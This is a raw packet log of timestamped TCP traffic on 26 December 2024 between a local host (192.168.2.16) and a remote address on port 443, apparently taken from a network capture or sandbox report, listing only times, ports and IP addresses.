Dec 26, 2024 18:26:43.310394049 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.310460091 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.310472012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.310508966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.319544077 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.319564104 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.319624901 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.319634914 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.319677114 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.328778028 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.328794003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.328854084 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.328865051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.328908920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.337130070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.337146044 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.337215900 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.337227106 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.337263107 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.345669031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.345700026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.345755100 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.345761061 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.345788002 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.345808029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.486881971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.486913919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.486968994 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.486977100 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.487026930 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.487046003 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.494230986 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.494252920 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.494307041 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.494311094 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.494347095 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.494370937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.501740932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.501763105 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.501831055 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.501837015 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.501887083 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.508318901 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.508338928 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.508383036 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.508388042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.508416891 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.508435965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.516210079 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.516230106 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.516274929 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.516279936 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.516324043 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.522800922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.522823095 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.522862911 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.522867918 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.522897005 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.522916079 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.526845932 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.530150890 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.530172110 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.530219078 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.530224085 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.530260086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.530280113 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.537560940 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.537580967 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.537633896 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.537638903 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.537686110 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.697519064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.697541952 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.697582960 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.697591066 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.697613955 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.697638988 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.704978943 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.705004930 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.705037117 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.705040932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.705068111 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.705087900 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.711648941 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.711669922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.711724997 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.711730003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.711750031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.711769104 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.718976974 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.718996048 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.719048977 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.719053984 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.719098091 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.726351976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.726372957 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.726417065 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.726422071 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.726445913 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.726465940 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.733345985 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.733366013 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.733414888 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.733418941 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.733458042 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.740607023 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.740895033 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.740914106 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.740952969 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.740957022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.740988970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.741007090 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.747381926 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.747401953 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.747447968 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.747452974 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.747476101 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.747493029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.908248901 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.908282995 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.908428907 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.908428907 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.908442020 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.908488035 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.915605068 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.915627003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.915689945 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.915697098 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.915741920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.922049999 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.922069073 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.922120094 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.922126055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.922148943 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.922168016 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.929749966 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.929769993 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.929831982 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.929836988 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.929879904 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.936975956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.936995983 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.937052011 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.937057018 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.937098026 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.943928003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.943948984 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.944010973 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.944020033 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.944062948 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.951514959 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.951536894 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.951581001 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.951586008 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.951606035 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.951633930 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.958117962 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.958139896 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.958194017 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.958199024 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.958244085 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.119343042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.119383097 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.119429111 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.119436026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.119472027 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.119489908 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.126024008 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.126044035 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.126081944 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.126086950 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.126116037 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.126137972 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.133268118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.133289099 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.133342028 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.133347988 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.133397102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.140747070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.140767097 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.140808105 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.140813112 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.140836954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.140860081 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.147150040 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.147171021 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.147209883 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.147216082 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.147247076 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.147258043 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.155148029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.155169964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.155221939 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.155227900 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.155255079 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.155282021 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.160628080 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.160674095 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.160710096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.160715103 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.160748959 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.167124987 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.167146921 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.167193890 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.167198896 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.167232990 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.216685057 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.293555975 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.327657938 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.327692032 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.327750921 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.327760935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.327792883 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.327815056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.335016966 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.335040092 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.335082054 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.335087061 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.335115910 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.335136890 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.342582941 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.342602968 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.342641115 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.342647076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.342685938 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.349993944 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.350013971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.350049019 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.350053072 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.350087881 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.350105047 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.356395006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.356415987 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.356477022 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.356482029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.356527090 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.363445044 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.363466024 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.363508940 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.363514900 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.363540888 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.363564014 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.370992899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.371015072 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.371052980 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.371057034 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.371083975 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.371103048 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.378417969 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.378437996 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.378479004 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.378484011 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.378511906 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.378530025 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.538186073 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.538213968 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.538294077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.538300991 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.538353920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.546278954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.546298981 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.546356916 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.546363115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.546406031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.553078890 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.553106070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.553158998 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.553164005 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.553200006 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.560558081 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.560585022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.560635090 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.560641050 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.560652018 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.560678959 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.567090034 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.567110062 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.567150116 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.567154884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.567183971 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.567203999 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.575141907 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.575164080 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.575191975 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.575197935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.575222969 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.575243950 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.581500053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.581521034 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.581559896 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.581566095 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.581589937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.581614017 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.583671093 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.583725929 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.588882923 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.588929892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.588943958 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.588948011 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.588973999 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.588987112 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.751641035 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.751665115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.751707077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.751713037 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.751746893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.751764059 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.752835989 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.752887011 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.760276079 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.760297060 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.760332108 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.760337114 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.760365963 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.767673016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.767700911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.767735958 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.767741919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.767760038 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.774305105 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.774332047 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.774365902 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.774373055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.774398088 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.782114029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.782141924 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.782176018 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.782181978 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.782210112 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.788665056 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.788682938 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.788722992 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.788727999 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.788757086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.796010971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.796035051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.796072006 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.796077013 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:44.796111107 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:44.803536892 CET	443	49719	172.67.214.186	192.168.2.16
